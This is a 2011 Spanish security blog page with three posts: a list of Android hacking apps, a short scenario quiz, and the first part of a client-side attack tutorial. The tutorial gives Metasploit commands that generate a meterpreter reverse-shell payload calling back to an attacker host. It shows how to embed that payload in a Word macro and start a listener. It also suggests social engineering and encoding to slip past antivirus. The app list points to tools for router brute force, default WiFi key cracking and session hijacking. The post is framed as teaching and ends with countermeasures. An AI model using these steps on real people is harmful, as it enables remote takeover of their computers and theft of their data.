sábado, 29 de octubre de 2011

Kit de herramientas de seguridad y hacking para Android

roadWarrior

Imágen de Android Guerrero por Irskaad

Esta no es una lista cerrada (la iremos ampliando), vamos a mostrar algunas aplicaciones gratuitas que convierten tu Android en un auténtico road warrior para la auditar la seguridad de todo tipo de redes y sistemas.

Lo primero ya sabes, es necesario que tengas tu Android rooteado, la mayoría de estas aplicaciones lo requieren. Android es prácticamente un Linux, y por lo tanto estas aplicaciones de bajo nivel requieren acceso root a la mayoría de las funciones del sistema.

Vamos con esta auténtica navaja suiza de la seguridad Android:

Router Passwords: más que una aplicación, es una base de datos con toda la información  (login y passwords por defecto) de multitud de routers de todas las marcas.

Router Brute Force: si no quieres molestarte mirando el diccionario en la aplicación anterior, puedes intentar averiguarla (por fuerza bruta, usando diccionarios) a través de este programa. Si ya tienes acceso a una red, esta herramienta es perfecta para intentar acceder al router.

Terminal Emulator: necesario, tener siempre a mano una ventana de línea de comandos (shell de Linux) por lo que pueda pasar ;)

Wireless Tether: si necesitas conectar el ordenador a Internet, esta es la aplicación perfecta para hacerlo desde el móvil. Crea un WiFi desde la cual puedes conectar cualquier ordenador y tener acceso a la web.

NetWork Discovery: creo que es la aplicación que más información te ofrece sobre una red. Es capaz de escanear una red y mostrar un listado de todos los dispositivos conectados a la misma con sus respectivas direcciones IP y MAC. Pero no sólo eso, además te lo identifica, si es un router, un PC, una impresora, etc.

PulWifi: muestra las contraseñas por defecto de algunos puntos de acceso WiFi. Soporta las de WLAN_XXXXX, JAZZTEL_XXXXX, YACOMXXXXX, WIFIXXXX, algunos modelos de D-Link y de Huawei. Perfecto para analizar el nivel de seguridad de tu WiFi.

Shark: sniffer  de red que funciona en 3G y Wifi. Es un port del famoso tcpdump. Te permite examinar los paquetes TCP/IP que pasan por tu sistema.

ConnectBot: cliente Telnet/SSH de código abierto, permite también hacer SSH tunneling (técnica utilizada para evitar cortafuegos ó proteger tu información).

WifiAnalyzer: otra herramienta más para analizar a fondo una WiFi. Muestra los canales, MAC, tipo de encriptación y la potencia de la señal. Ideal para encontrar el canal perfecto para ajustar nuestro hardware.

ElectroDroid: cuando tienes que pasar a la acción a nivel hardware, esta aplicación puede que te venga bien. Es una biblioteca de referencia sobre Electrónica, que incluye código de color de resistencias, calculadora de varias fórmulas electrónicas, patillaje de todos los puertos de un ordenador y de aparatos de video, tablas de todo tipo, etc. Indispensable.

WLANAudit: aplicación para encontrar redes WiFi y comprobar su seguridad. Con algunos puntos es capaz de calcular la contraseña por defecto del cifrado empleado.

WiFi File Explorer: permite compartir ficheros desde tu dispositivo móvil. En otras palabras, convierte tu móvil en un servidor de ficheros dentro de la red.

Bluetooth File Transfer: busca, explora y gestiona ficheros en cualquier dispositivo Bluetooth usando FTP y OPP. No sólo vivimos de WiFi’s ;)

Hackers Dictionary: por si olvidas algún término, aquí tienes el famoso Jargon File.

Working with BackTrack: desde la instalación de BackTrack hasta todo tipo de información sobre esta distribución Linux de seguridad. Incluye vídeos y documentos de todo tipo, altamente recomendable.

Droidsheep: si ya conoces Firesheep ya sabes de que va esta herramienta. Como la definen en su web “Secuestro de sesiones en un sólo click” o como diría yo (tuxotron) “Secuestro de sesiones a golpe de ratón dedo” :) .

Faceniff: permite capturar sesiones web sobre wifi. Funciona sobre redes Abierta/WEP/WPA-PSK/WPA2-PSK. Es parecida a Droidsheep.

Router Keygen: al igual que PullWifi, detecta y genera las claves de encriptación (WEP y WPA) por defecto de: Routers basados enThomson (Thomson, SpeedTouch, Orange, Infinitum, BBox, DMax, BigPond, O2Wireless, Otenet, Cyta , TN_private ), DLink (sólo algunos modelos), Pirelli Discus, Eircom, Verizon FiOS (sólo algunos modelos), Alice AGPF, FASTWEB Pirelli and Telsey, Huawei (algunos Infinitum), Wlan_XXXX or Jazztel_XXXX (Comtrend y Zyxel), Wlan_XX (algunos modelos), Ono ( P1XXXXXX0000X ), WlanXXXXXX, YacomXXXXXX y WifiXXXXXX (también conocido como wlan4xx ), Sky V1, Clubinternet.box v1 y v2 (TECOM), InfostradaWifi

Fing – Network Tools: herramienta que nos provee funcionalidades para sacar todo tipo de información de un red: network discovery, escaneo de servicios, ping, traceroute, DNS lookup, etc. Muy completa.

Shark Reader: lector de ficheros pcap. Por lo visto tiene problemas con ficheros grandes, pero nos podría resultar muy útil para echar un vistazo rápido después de haber capturado tráfico de red.

Arpspoof: una utilidad casi indispensable para capturar tráfico de red que no vaya dirigido a nosotros usando lo que se conoce como arp spoofing. Digo casi indispensable, porque que podemos conseguir lo mismo con tcpdump.

tcpdump: este no lo teníamos en la lista y que puede decir de éste. Tcpdump es la herramienta de facto de cualquier máquina *nix, para analizar el tráfico de red y por consiguiente capturarlo. Esta versión para Android no tiene la potencia que la de un sistema *nix, pero nos ofrece las funcionalidades básicas, entre ellas la captura de paquetes.

Anti: Android Network Toolkit es un conjunto de utilidades que nos permite explotar servicios en una red local. Es una especie de mini metasploit para Android. El problema es que tiene varias versiones y con lo que te ofrece la gratuita lo puedes hacer con el resto de herramientas aquí listadas, pero se eres un profesional de la seguridad informática, ésta seria una gran adición a tu caja de herramientas.

Routerpwn: colección de vulnerabilidades para los rourters más conocidos y dispositivos embebidos.

Bueno esta lista supongo que se puede ampliar, esperamos vuestras aportaciones.

Por supuesto, CyberHades no se hace responsable del mal uso de todas estas aplicaciones, vamos que ya somos mayorcitos ;)

Fuente: http://www.cyberhades.com/2011/10/20/kit-de-herramientas-de-seguridad-y-hacking-para-android/

jueves, 6 de octubre de 2011

Security Jack all Trades–Cartero

Continuando con el post anterior, a continuación las instrucciones:

Este es un test que se trabaja bajo escenarios, cada escenario es familiar por lo que no necesitas conocimientos técnicos, cada escenario tiene cuatro preguntas, las respuestas deben ser breves (las pueden publicar acá), las respuestas de “ciencia ficción” no son válidas, si lo toman por su cuenta, cada una debería tomarles 10 minutos. Podemos discutir las respuestas (de hecho esa es la idea).

Escenario Uno – Cartero

Eres un cartero de un servicio de correo postal independiente. Tienes que entregar un paquete del tamaño de un libro.

1. Enumere 10 maneras de identificar al RECEPTOR del mensaje.

2. Liste 10 cosas que te impedirían de entregar el paquete.

3. Liste 10 razones para no entregar el paquete.

4. Enumere 10 maneras de identificar al REMITENTE del mensaje.

Espero sus respuestas!!!

sábado, 1 de octubre de 2011

Client Side Attacks 1 de 3

Continuemos con la presentación de ataques al lado del cliente, como prólogo (y algo de historia) podemos indicar que el movimiento inicial en temas de ataque corría a través de la conexión a servicios públicamente disponibles por diversas entidades, el famoso PortScanning permite realizar dichas acciones para que, en base a los servicios encontrados, el atacante pueda realizar ataques de password cracking sobre los servicios, enviarle algún exploit o verificar si existe algo para el information gathering, de hecho existen servicios como Shodan que permiten hacer una búsqueda de servicios al estilo de un motor de búsqueda, para disminuir este vector de ataque tenemos distintos sabores de firewall y configuraciones.

Cerrados estos puntos, el atacante comenzó a atacar a los servicios y aplicaciones que se encuentran bajo estos pocos (en el mejor de los casos), que en la mayoría de los casos son aplicaciones Web, de ahí vienen las técnicas de inyección de parámetros (SQL Injection, XSS, Parameter Pollution, etc.). Ante esto, técnicas de programación segura (SDLC) es lo esencial, claro que ayuda un WAF o un DBF de por medio Guiño.

Entonces que hacemos una vez que se han cerrado todos estos vectores de ataque…., recurrimos a nuestro buen (e ingenuo) amigo: el empleado, estas técnicas de ataque están orientadas a ellos, puede ser tan grande el impacto que este año llevamos algunas grandes empresas atacadas por estas técnicas: Google, Comodo, RSA, etc. entre las más conocidas.

Podemos definir 3 tipos de client side attacks: File Format, Web Attacks y Código Móvil, en este post nos concentraremos en la primera.

File Format

En un ataque de tipo file format, se ataca mediante un exploit o contenido malicioso, a las aplicaciones de escritorio del usuario: Word, Excel, Acrobat, Winamp, etc., la idea es generar un archivo con las características mencionadas, en este ejemplo vamos a realizar un ataque contra Word, utilizando Metasploit.

Metasploit tiene un módulo de generación de payloads, el cual nos permitirá generar el código malicioso, que luego incrustaremos al documento, el comando es el siguiente:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.52.131 LPORT=443 V > /root/exploit.bas

Lo que acá indicamos es que utilice el payload meterpreter, mediante un reverse tcp (shell inverso), una vez que se ejecute realice la conexión contra el host 192.168.52.131 (puede ser una dirección pública si realizamos el ataque a través de internet), hacemos que se conecte a través del puerto 443 (SSL), puesto que la mayoría de las compañías tienen ese puerto habilitado de salida para sus usuarios para que puedan navegar hacia sitios seguros, finalmente hacemos que se cree el payload en código de Visual Basic (la opción “V”) y lo envíe a la ruta indicada. Si lo deseamos podemos añadir encriptación mediante el módulo msfencode, o mejor aún utilizar los dos en un solo comando mediante msfvenom.

El payload generado tiene dos partes, la primera se coloca como un macross en Office, para ello copiamos el archivo generado, hasta antes de las líneas PAYLOAD DATA y lo guardamos en otro archivo.

image

Ingresamos al Editor de Visual Basic:

image

E importamos el archivo anteriormente generado:

image

Con lo cual tendremos el módulo cargado:

image

Cerramos el editor de visual basic (guardando lo cambios), y luego copiamos la segunda parte del documento, a partir de PAYLOAD DATA

image

Y copiamos su contenido al final del documento:

image

Con ello ya tenemos el archivo malicioso generado, estos tipos de archivos usualmente son propagados mediante cadenas o combinados con técnicas de ingeniería social para que el usuario abra el archivo con confianza.

Antes de continuar con el ataque se necesita habilitar el servicio de escucha en Metasploit, para que cuando el usuario abra el archivo y realice la conexión, nosotros estemos preparados escuchándola, los siguientes comandos nos ayudan:

./msfcli exploit/multi/handler LHOST=192.168.52.131 LPORT=443 PAYLOAD=windows/meterpreter/reverse_tcp E

Con ello indicamos la apertura de un servicio de escucha genérico (multi/handler) en nuestra maquina a través del puerto 443 esperando un reverse_tcp, con lo cual tendremos el servicio a la escucha:

image

Finalmente solo queda esperar que el usuario abra el documento, en este caso uno con SO Windows 7 y Office 2010:

image

Como se aprecia en la imagen el mismo Office no permite por defecto la ejecución de Macross, para ello es importante las técnicas de ingeniería social para convencer al usuario de abrir el documento, o por ejemplo enviar en un Excel, muchos empleados de áreas comercial o marketing, tienen siempre habilitada la ejecución de Macross, con ello tenemos:

image

Cuando el usuario acepta, casi inmediatamente, tendremos el acceso desde el lado del atacante:

image

Desde ahora, el atacante pude hacer lo que desee, por ejemplo hacer un dump de los hashes de los usuarios de Windows, copiar contenido de esa maquina o, en el peor escenario, utilizar la maquina para hacer pivoting (que funcione como zombie) para atacar desde adentro a otros servidores internos.

Contramedidas

Como se mencionó anteriormente parte de la configuración de Office impide este tipo de ataque a menos que intervenga el usuario, es posible entonces afinar algunas reglas mediante GPO’s para impedir la ejecución de Macross, otra acción a realizar viene de la mano del antivirus el cual detecta estos payloads:

image

Sin embargo, como lo mencionamos es posible añadir encriptación para hacer al payload indetectable.

Otra medida algo más adecuada es hacer uso de un antivirus con Firewall personal incorporado, los mismos permiten cerrar las conexiones mediante programas fuentes de confianza.

image

En el mismo podemos indicar que programas del usuario tienen salida a internet y hacia que puertos, con ello impedimos que como mostramos en este ejemplo un archivo Word se conecte contra un equipo a través de puertos no autorizados.

Espero sus comentarios mientras continuamos con la segunda parte.

Saludos cordiales